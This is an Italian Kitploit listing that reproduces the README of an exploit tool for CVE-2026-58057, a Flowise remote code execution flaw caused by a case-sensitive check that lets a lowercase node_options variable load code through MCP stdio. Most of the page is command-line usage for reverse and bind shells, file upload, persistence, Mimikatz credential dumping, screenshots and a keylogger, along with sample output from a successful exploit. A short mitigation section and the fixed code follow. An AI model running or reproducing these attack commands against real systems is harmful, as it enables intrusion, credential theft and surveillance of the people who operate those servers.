Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit RCE per Windows di Flowise per CVE-2026-58057. Bypassa la validazione delle variabili d'ambiente tramite una falla case-sensitive. Utilizza node_options per iniettare codice arbitrario tramite MCP stdio. Supporta reverse shell, persistenza, upload di file e credential dumping. Solo per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Meccanismi di PersistenzaAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlRed Teaming
Sviluppo Payload
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Vedi Repository
191 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit RCE per Windows di Flowise per CVE-2026-58057. Bypassa la validazione delle variabili d'ambiente tramite una falla case-sensitive. Utilizza node_options per iniettare codice arbitrario tramite MCP stdio. Supporta reverse shell, persistenza, upload di file e credential dumping. Solo per test di sicurezza autorizzati.

Condividi

Flowise CVE-2026-58057 - Exploit di Esecuzione di Codice Remoto su Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge

Affected Versions Badge
Fixed Version Badge

📋 Panoramica

Questo è un exploit di livello produzione per CVE-2026-58057, una vulnerabilità critica di esecuzione di codice remoto in Flowise su piattaforme Windows. La vulnerabilità deriva dalla validazione delle variabili d'ambiente sensibile alle maiuscole che non riesce a bloccare node_options in minuscolo, consentendo agli aggressori di bypassare la denylist NODE_OPTIONS ed eseguire codice arbitrario tramite la configurazione Custom MCP stdio.

L'exploit dimostra pratiche professionali di ingegneria del software con architettura modulare, gestione completa degli errori e supporto per molteplici tipi di payload.

f1

f2

⚠️ Disclaimer

IMPORTANTE: Questo strumento è fornito esclusivamente per test di sicurezza autorizzati, test di penetrazione e scopi educativi.L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software.Ottenere sempre la dovuta autorizzazione prima di testare qualsiasi sistema.

🔍 Dettagli Tecnici

Causa Radice della Vulnerabilità

root@kitploit:~
# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Meccanismo dell'Exploit

  1. L'aggressore autentica su Flowise

  2. Crea/Modifica il nodo Custom MCP stdio

  3. Inietta la variabile d'ambiente node_options in minuscolo

  4. Imposta il valore su --require malicious-loader.js

  5. Node.js esegue il loader quando viene eseguito MCP stdio

  6. Viene ottenuta l'esecuzione di codice arbitrario

✨ Funzionalità

Capacità Principali

  • ✅ Reverse Shell - Connessione di ritorno alla macchina dell'aggressore

  • ✅ Bind Shell - Apre una porta in ascolto sul bersaglio

  • ✅ Command Execution - Esegue comandi di sistema arbitrari

  • ✅ File Upload - Carica file sul sistema bersaglio

  • ✅ Persistence - Molteplici meccanismi di persistenza

  • ✅ Information Gathering - Raccoglie informazioni sul sistema

  • ✅ Credential Dumping - Integrazione con Mimikatz

  • ✅ Screenshot Capture - Acquisisce screenshot del desktop

  • ✅ Keylogger - Installa funzionalità di keylogging

Caratteristiche Tecniche

  • 🔐 Molteplici Metodi di Autenticazione - API key o nome utente/password

  • 🔄 Logica di Riprova Automatica - Resiliente ai problemi di rete

  • 🧹 Auto-Pulizia - Rimuove i file loader dal bersaglio

  • 🌐 Multi-Piattaforma - Funziona su Windows/Linux/macOS

  • 🎨 Output Colorato - Leggibilità migliorata

  • 📊 Debug Dettagliato - Logging dettagliato per la risoluzione dei problemi

📦 Installazione

Prerequisiti

  • Python 3.6 o superiore

  • pip (gestore di pacchetti Python)

Installazione Rapida

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Installazione Docker (Opzionale)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Utilizzo

Opzioni della Riga di Comando

root@kitploit:~
python3 exploit.py --help

Opzioni di Autenticazione

OpzioneDescrizioneEsempio
-t, --targetURL di Flowise (Obbligatorio)http://localhost:3000
-k, --api-keyAPI key di Flowiseflowise_abc123...
-u, --usernameNome utenteadmin
-p, --passwordPasswordpassword123

Opzioni del Payload

OpzioneDescrizioneEsempio
--payloadTipo di payloadreverse_shell
--lhostHost in ascolto192.168.1.100
--lportPorta in ascolto4444
--commandComando da eseguirewhoami
--local-fileFile da caricarepayload.exe
--remote-pathPercorso di salvataggio remotoC:\\Temp\\update.exe

Opzioni di Esecuzione

OpzioneDescrizione
--interactiveAvvia shell interattiva
--verboseAbilita output di debug
--timeoutTimeout della richiesta in secondi
--retriesNumero di tentativi di ripetizione

📝 Esempi di Utilizzo

1. Reverse Shell di Base

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell Interattivo

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Esecuzione di Comandi

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Caricamento File

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Estrazione Credenziali (Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Installazione della Persistenza

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Raccolta di Informazioni

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Acquisizione Screenshot

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Tipi di Payload

PayloadDescrizioneArgomenti
reverse_shellConnessione di ritorno al listener--lhost, --lport
bind_shellApre una porta in ascolto--lport
command_execEsegue un comando--command
file_uploadCarica un file sul bersaglio--local-file, --remote-path
persistenceInstalla la persistenzaNessuno
info_gatherRaccoglie informazioni di sistemaNessuno
mimikatzEstrae le credenzialiNessuno
screenshotAcquisisce uno screenshotNessuno
keyloggerInstalla il keyloggerNessuno

🛡️ Mitigazione

Aggiornare Flowise

root@kitploit:~
# Upgrade to version 3.1.3 or later
npm install -g flowise@latest
# or
docker pull flowiseai/flowise:latest

Soluzioni Alternative

  • Limitare l'accesso alla configurazione Custom MCP

  • Implementare la segmentazione di rete

  • Monitorare le variabili d'ambiente sospette

  • Utilizzare un Web Application Firewall (WAF)

Codice Corretto

root@kitploit:~
# Fixed Validation (Case-Insensitive)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Case-insensitive check
    raise ValueError(f"Modification not allowed")

📊 Esempi di Output

Exploit Riuscito

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

Modalità Verbose

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 Risoluzione dei Problemi

Problemi Comuni

ProblemaSoluzione
Errore certificato SSLpip install --trusted-host pypi.org -r requirements.txt
Permesso negatopip install --user -r requirements.txt
Connessione rifiutataVerificare l'URL del bersaglio e la connettività di rete
Autenticazione fallitaControllare API key o nome utente/password
Il payload fallisceUsare --verbose per un debug dettagliato
Versione PythonAssicurarsi che Python 3.6+ sia installato

Comandi di Debug

root@kitploit:~
# Enable verbose logging
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Test connectivity
curl -k https://localhost:3000/api/v1/version

# Check Python version
python3 --version

📁 Struttura dei File

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Main exploit script
├── requirements.txt    # Core dependencies
├── README.md          # This documentation
├── LICENSE            # MIT License
└── CHANGELOG.md       # Version history

🤝 Contributi

  1. Fai il fork del repository

  2. Crea un branch per la funzionalità (git checkout -b feature/amazing)

  3. Committa le modifiche (git commit -m 'Add amazing feature')

  4. Esegui il push del branch (git push origin feature/amazing)

  5. Apri una Pull Request

📜 Licenza

Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.

🏆 Riconoscimenti

  • FlowiseAI per il prodotto

  • Ricercatori di sicurezza che hanno scoperto vulnerabilità simili

  • Comunità di penetration testing per le metodologie di test

🔗 Riferimenti

  • CVE-2026-58057

  • Repository GitHub di Flowise

  • Documentazione di Flowise

  • Sicurezza delle Variabili d'Ambiente in Node.js

📧 Contatti

Autore: Sudeepa Wanigarathna Ricercatore di Sicurezza & Penetration Tester

⭐ Supporto

Se trovi utile questo strumento, considera:

  • ⭐ Mettere una stella al repository su GitHub

  • 🔔 Seguire per ricevere aggiornamenti

  • 📝 Segnalare problemi o suggerimenti


Realizzato con ❤️ per la community della sicurezza

Scarica lo strumento